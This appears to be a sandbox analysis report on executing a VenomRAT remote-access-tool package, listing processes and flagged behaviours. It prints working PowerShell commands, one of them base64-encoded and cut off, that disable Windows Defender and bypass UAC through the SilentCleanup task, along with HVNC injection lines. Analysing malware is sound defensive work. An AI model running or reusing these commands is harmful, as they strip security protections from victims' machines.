chrome.exe 124 PID 4928 wrote to memory of 5316 4928 chrome.exe 124 PID 4928 wrote to memory of 5316 4928 chrome.exe 124 PID 4928 wrote to memory of 5316 4928 chrome.exe 124 PID 4928 wrote to memory of 5316 4928 chrome.exe 124 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:684
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender Real-time Protection settings
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2144 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3372
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵
- System Location Discovery: System Language Discovery
PID:944
-
-
C:\Windows\SysWOW64\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵
- System Location Discovery: System Language Discovery
PID:3180
-
-
C:\Windows\SysWOW64\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵
- System Location Discovery: System Language Discovery
PID:6896
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2956
-
-
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\VenomRAT.v6.0.3.+SOURCE.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4976
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2744
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding1⤵PID:3956
-
C:\Users\Admin\Desktop\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Venom RAT + HVNC + Stealer + Grabber.exe"C:\Users\Admin\Desktop\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\Venom RAT + HVNC + Stealer + Grabber.exe"1⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1808 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe" C:\Users\Admin\Desktop\VenomRAT v6.0.3 (+SOURCE)\VenomRAT v6.0.3 (SOURCE)\ClientsFolder\127.0.0.1\Recovery2⤵PID:3664
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:2596
-
C:\Users\Admin\Desktop\Client.exe"C:\Users\Admin\Desktop\Client.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3228 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --single-argument C:\Users\Admin\Desktop\CheckpointDisconnect.shtml3⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb51fccc40,0x7ffb51fccc4c,0x7ffb51fccc584⤵PID:3420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2316,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2308 /prefetch:24⤵PID:5280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1628,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2352 /prefetch:34⤵PID:5308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1944,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2500 /prefetch:84⤵PID:5316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3084,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3112 /prefetch:14⤵PID:5476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3104,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3148 /prefetch:14⤵PID:5488
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4612,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4644 /prefetch:14⤵PID:5936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4792,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4916 /prefetch:14⤵PID:5980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4616,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4892 /prefetch:84⤵PID:4904
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5080,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5076 /prefetch:84⤵PID:3104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4844,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5100 /prefetch:84⤵PID:3780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5256 /prefetch:84⤵PID:5012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4484,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4828 /prefetch:24⤵PID:4032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5412,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5148 /prefetch:14⤵PID:3940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4560,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5100 /prefetch:14⤵PID:3820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5548,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4828 /prefetch:14⤵PID:4132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4656,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5540 /prefetch:14⤵PID:2892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4388,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4776 /prefetch:84⤵PID:3352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4384,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3168 /prefetch:84⤵PID:5776
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3248,i,14142108609075503244,8160434733762555357,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5072 /prefetch:84⤵PID:232
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1 4448 HVNC_MUTEX2⤵PID:4188
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1 4448 HVNC_MUTEX2⤵PID:4356
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Default 127.0.0.1 4448 HVNC_MUTEX2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2304 -
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe"3⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:1724
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QAAoAGUAYwBoAG8AIABvAGYAZgAlACkAWwAxAF0ADQAKAHMAcAAgACcASABLAEMAVQA6AFwAVgBvAGwAYQB0AGkAbABlACAARQBuAHYAaQByAG8AbgBtAGUAbgB0ACcAIAAnAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAnACAAQAAnAA0ACgBpAGYAIAAoACQAKABzAGMALgBlAHgAZQAgAHEAYwAgAHcAaQBuAGQAZQBmAGUAbgBkACkAIAAtAGwAaQBrAGUAIAAnACoAVABPAEcARwBMAEUAKgAnACkAIAB7ACQAVABPAEcARwBMAEUAPQA3ADsAJABLAEUARQBQAD0ANgA7ACQAQQA9ACcARQBuAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBGAEYAJwB9AGUAbABzAGUAewAkAFQATwBHAEcATABFAD0ANgA7ACQASwBFAEUAUAA9ADcAOwAkAEEAPQAnAEQAaQBzAGEAYgBsAGUAJwA7ACQAUwA9ACcATwBOACcAfQANAAoADQAKAGkAZgAgACgAJABlAG4AdgA6ADEAIAAtAG4AZQAgADYAIAAtAGEAbgBkACAAJABlAG4AdgA6ADEAIAAtAG4AZQAgADcAKQAgAHsAIAAkAGUAbgB2ADoAMQA9ACQAVABPAEcARwBMAEUAIAB9AA0ACgANAAoAcwB0AGEAcgB0ACAAYwBtAGQAIAAtAGEAcgBnAHMAIAAnAC8AZAAvAHIAIABTAGUAYwB1AHIAaQB0AHkASABlAGEAbAB0AGgAUwB5AHMAdAByAGEAeQAgACYAIAAiACUAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAJQBcAFcAaQBuAGQAbwB3AHMAIABEAGUAZgBlAG4AZABlAHIAXABNAFMAQQBTAEMAdQBpAEwALgBlAHgAZQAiACcAIAAtAHcAaQBuACAAMQANAAoADQAKACQAbgBvAHQAaQBmAD0AJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABOAG8AdABpAGYAaQBjAGEAdABpAG8AbgBzAFwAUwBlAHQAdABpAG4AZwBzAFwAVwBpAG4AZABvAHcAcwAuAFMAeQBzAHQAZQBtAFQAbwBhAHMAdAAuAFMAZQBjAHUAcgBpAHQAeQBBAG4AZABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAJwANAAoAbgBpACAAJABuAG8AdABpAGYAIAAtAGUAYQAgADAAfABvAHUAdAAtAG4AdQBsAGwAOwAgAHIAaQAgACQAbgBvAHQAaQBmAC4AcgBlAHAAbABhAGMAZQAoACcAUwBlAHQAdABpAG4AZwBzACcALAAnAEMAdQByAHIAZQBuAHQAJwApACAALQBSAGUAYwB1AHIAcwBlACAALQBGAG8AcgBjAGUAIAAtAGUAYQAgADAADQAKAHMAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgADAAIAAtAFQAeQBwAGUAIABEAHcAbwByAGQAIAAtAEYAbwByAGMAZQAgAC0AZQBhACAAMAA7ACAAaQBmACAAKAAkAFQATwBHAEcATABFACAALQBlAHEAIAA3ACkAIAB7AHIAcAAgACQAbgBvAHQAaQBmACAARQBuAGEAYgBsAGUAZAAgAC0ARgBvAHIAYwBlACAALQBlAGEAIAAwAH0ADQAKAA0ACgAkAHQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAJwBTAGMAaABlAGQAdQBsAGUALgBTAGUAcgB2AGkAYwBlACcAOwAgACQAdABzAC4AQwBvAG4AbgBlAGMAdAAoACkAOwAgACQAYgBhAGYAZgBsAGkAbgBnAD0AJAB0AHMALgBHAGUAdABGAG8AbABkAGUAcgAoACcAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABEAGkAcwBrAEMAbABlAGEAbgB1AHAAJwApAA0ACgAkAGIAcABhAHMAcwA9ACQAYgBhAGYAZgBsAGkAbgBnAC4ARwBlAHQAVABhAHMAawAoACcAUwBpAGwAZQBuAHQAQwBsAGUAYQBuAHUAcAAnACkAOwAgACQAZgBsAGEAdwA9ACQAYgBwAGEAcwBzAC4ARABlAGYAaQBuAGkAdABpAG8AbgANAAoADQAKACQAdQA9ADAAOwAkAHcAPQB3AGgAbwBhAG0AaQAgAC8AZwByAG8AdQBwAHMAOwBpAGYAKAAkAHcALQBsAGkAawBlACcAKgAxAC0ANQAtADMAMgAtADUANAA0ACoAJwApAHsAJAB1AD0AMQB9ADsAaQBmACgAJAB3AC0AbABpAGsAZQAnACoAMQAtADEANgAtADEAMgAyADgAOAAqACcAKQB7ACQAdQA9ADIAfQA7AGkAZgAoACQAdwAtAGwAaQBrAGUAJwAqADEALQAxADYALQAxADYAMwA4ADQAKgAnACkAewAkAHUAPQAzAH0ADQAKAA0ACgAkAHIAPQBbAGMAaABhAHIAXQAxADMAOwAgACQAbgBmAG8APQBbAGMAaABhAHIAXQAzADkAKwAkAHIAKwAnACAAKABcACAAIAAgAC8AKQAnACsAJAByACsAJwAoACAAKgAgAC4AIAAqACAAKQAgACAAQQAgAGwAaQBtAGkAdABlAGQAIABhAGMAYwBvAHUAbgB0ACAAcAByAG8AdABlAGMAdABzACAAeQBvAHUAIABmAHIAbwBtACAAVQBBAEMAIABlAHgAcABsAG8AaQB0AHMAJwArACQAcgArACcAIAAgACAAIABgAGAAYAAnACsAJAByACsAWwBjAGgAYQByAF0AMwA5AA0ACgAkAHMAYwByAGkAcAB0AD0AJwAtAG4AbwBwACAALQB3AGkAbgAgADEAIAAtAGMAIAAmACAAewByAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAA7ACQAQQB2AGUAWQBvAD0AJwArACQAbgBmAG8AKwAnADsAJABlAG4AdgA6ADEAPQAnACsAJABlAG4AdgA6ADEAOwAgACQAZQBuAHYAOgBfAF8AQwBPAE0AUABBAFQAXwBMAEEAWQBFAFIAPQAnAEkAbgBzAHQAYQBsAGwAZQByACcADQAKACQAcwBjAHIAaQBwAHQAKwA9ACcAOwBpAGUAeAAoACgAZwBwACAAUgBlAGcAaQBzAHQAcgB5ADoAOgBIAEsARQBZAF8AVQBzAGUAcgBzAFwAUwAtADEALQA1AC0AMgAxACoAXABWAG8AbABhAHQAaQBsAGUAKgAgAFQAbwBnAGcAbABlAEQAZQBmAGUAbgBkAGUAcgAgAC0AZQBhACAAMAApAFsAMABdAC4AVABvAGcAZwBsAGUARABlAGYAZQBuAGQAZQByACkAfQAnADsAIAAkAGMAbQBkAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAJwArACQAcwBjAHIAaQBwAHQADQAKAA0ACgBpAGYAIAAoACQAdQAgAC0AZQBxACAAMAApACAAewANAAoAIAAgAHMAdABhAHIAdAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGEAcgBnAHMAIAAkAHMAYwByAGkAcAB0ACAALQB2AGUAcgBiACAAcgB1AG4AYQBzACAALQB3AGkAbgAgADEAOwAgAGIAcgBlAGEAawANAAoAfQANAAoAaQBmACAAKAAkAHUAIAAtAGUAcQAgADEAKQAgAHsADQAKACAAIABpAGYAIAAoACQAZgBsAGEAdwAuAEEAYwB0AGkAbwBuAHMALgBJAHQAZQBtACgAMQApAC4AUABhAHQAaAAgAC0AaQBuAG8AdABsAGkAawBlACAAJwAqAHcAaQBuAGQAaQByACoAJwApAHsAcwB0AGEAcgB0ACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AYQByAGcAcwAgACQAcwBjAHIAaQBwAHQAIAAtAHYAZQByAGIAIAByAHUAbgBhAHMAIAAtAHcAaQBuACAAMQA7ACAAYgByAGUAYQBrAH0ADQAKACAAIABzAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgACQAKAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAnACsAJABzAGMAcgBpAHAAdAArACcAIAAjACcAKQANAAoAIAAgACQAegA9ACQAYgBwAGEAcwBzAC4AUgB1AG4ARQB4ACgAJABuAHUAbABsACwAMgAsADAALAAkAG4AdQBsAGwAKQA7ACAAJAB3AGEAaQB0AD0AMAA7ACAAdwBoAGkAbABlACgAJABiAHAAYQBzAHMALgBTAHQAYQB0AGUAIAAtAGcAdAAgADMAIAAtAGEAbgBkACAAJAB3AGEAaQB0ACAALQBsAHQAIAAxADcAKQB7AHMAbABlAGUAcAAgAC0AbQAgADEAMAAwADsAIAAkAHcAYQBpAHQAKwA9ADAALgAxAH0ADQAKACAAIABpAGYAKABnAHAAIABoAGsAYwB1ADoAXABlAG4AdgBpAHIAbwBuAG0AZQBuAHQAIAB3AGkAbgBkAGkAcgAgAC0AZQBhACAAMAApAHsAcgBwACAAaABrAGMAdQA6AFwAZQBuAHYAaQByAG8AbgBtAGUAbgB0ACAAdwBpAG4AZABpAHIAIAAtAGUAYQAgADAAOwBzAHQAYQByAHQAIABwAG8AdwBlAHIAcwBoAGUAbABsACAALQBhAHIAZwBzACAAJABzAGMAcgBpAHAAdAAgAC0AdgBlAHIAYgAgAHIAdQBuAGEAcwAgAC0AdwBpAG4AIAAxAH0AOwBiAHIAZQBhAGsADQAKAH0ADQAKAGkAZgAgACgAJAB1ACAALQBlAHEAIAAyACkAIAB7AA0ACgAgACAAJABBAD0AWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMAQQBzAHMAZQBtAGIAbAB5ACIAKAAxACwAMQApAC4AIgBEAGUAZgBgAGkAbgBlAEQAeQBuAGEAbQBpAGMATQBvAGQAdQBsAGUAIgAoADEAKQA7ACQARAA9AEAAKAApADsAMAAuAC4ANQB8ACUAewAkAEQAKwA9ACQAQQAuACIARABlAGYAYABpAG4AZQBUAHkAcABlACIAKAAnAEEAJwArACQAXwAsAA0ACgAgACAAMQAxADcAOQA5ADEAMwAsAFsAVgBhAGwAdQBlAFQAeQBwAGUAXQApAH0AIAA7ADQALAA1AHwAJQB7ACQARAArAD0AJABEAFsAJABfAF0ALgAiAE0AYQBrAGAAZQBCAHkAUgBlAGYAVAB5AHAAZQAiACgAKQB9ACAAOwAkAEkAPQBbAEkAbgB0ADMAMgBdADsAJABKAD0AIgBJAG4AdABgAFAAdAByACIAOwAkAFAAPQAkAEkALgBtAG8AZAB1AGwAZQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4AJABKACIAKQA7ACAAJABGAD0AQAAoADAAKQANAAoAIAAgACQARgArAD0AKAAkAFAALAAkAEkALAAkAFAAKQAsACgAJABJACwAJABJACwAJABJACwAJABJACwAJABQACwAJABEAFsAMQBdACkALAAoACQASQAsACQAUAAsACQAUAAsACQAUAAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsACQASQAsAFsASQBuAHQAMQA2AF0ALABbAEkAbgB0ADEANgBdACwAJABQACwAJABQACwAJABQACwAJABQACkALAAoACQARABbADMAXQAsACQAUAApACwAKAAkAFAALAAkAFAALAAkAEkALAAkAEkAKQANAAoAIAAgACQAUwA9AFsAUwB0AHIAaQBuAGcAXQA7ACAAJAA5AD0AJABEAFsAMABdAC4AIgBEAGUAZgBgAGkAbgBlAFAASQBuAHYAbwBrAGUATQBlAHQAaABvAGQAIgAoACcAQwByAGUAYQB0AGUAUAByAG8AYwBlAHMAcwAnACwAIgBrAGUAcgBuAGUAbABgADMAMgAiACwAOAAyADEANAAsADEALAAkAEkALABAACgAJABTACwAJABTACwAJABJACwAJABJACwAJABJACwAJABJACwAJABJACwAJABTACwAJABEAFsANgBdACwAJABEAFsANwBdACkALAAxACwANAApAA0ACgAgACAAMQAuAC4ANQB8ACUAewAkAGsAPQAkAF8AOwAkAG4APQAxADsAJABGAFsAJABfAF0AfAAlAHsAJAA5AD0AJABEAFsAJABrAF0ALgAiAEQAZQBmAGAAaQBuAGUARgBpAGUAbABkACIAKAAnAGYAJwArACQAbgArACsALAAkAF8ALAA2ACkAfQB9ADsAJABUAD0AQAAoACkAOwAwAC4ALgA1AHwAJQB7ACQAVAArAD0AJABEAFsAJABfAF0ALgAiAEMAcgBgAGUAYQB0AGUAVAB5AHAAZQAiACgAKQA7ACQAWgA9AFsAdQBpAG4AdABwAHQAcgBdADoAOgBzAGkAegBlAA0ACgAgACAAbgB2ACAAKAAnAFQAJwArACQAXwApACgAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAFQAWwAkAF8AXQApACkAfQA7ACAAJABIAD0AJABJAC4AbQBvAGQAdQBsAGUALgBHAGUAdABUAHkAcABlACgAIgBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAGAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAYABzAGgAYQBsACIAKQA7AA0ACgAgACAAJABXAFAAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAVwByAGkAdABlACQASgAiACwAWwB0AHkAcABlAFsAXQBdACgAJABKACwAJABKACkAKQA7ACAAJABIAEcAPQAkAEgALgAiAEcAZQB0AGAATQBlAHQAaABvAGQAIgAoACIAQQBsAGwAbwBjAEgAYABHAGwAbwBiAGEAbAAiACwAWwB0AHkAcABlAFsAXQBdACcAaQBuAHQAMwAyACcAKQA7ACAAJAB2AD0AJABIAEcALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAWgApAA0ACgAgACAAJwBUAHIAdQBzAHQAZQBkAEkAbgBzAHQAYQBsAGwAZQByACcALAAnAGwAcwBhAHMAcwAnAHwAJQB7AGkAZgAoACEAJABwAG4AKQB7AG4AZQB0ADEAIABzAHQAYQByAHQAIAAkAF8AIAAyAD4AJgAxACAAPgAkAG4AdQBsAGwAOwAkAHAAbgA9AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABQAHIAbwBjAGUAcwBzAGUAcwBCAHkATgBhAG0AZQAoACQAXwApAFsAMABdADsAfQB9AA0ACgAgACAAJABXAFAALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsAEAAKAAkAHYALAAkAHAAbgAuAEgAYQBuAGQAbABlACkAKQA7ACAAJABT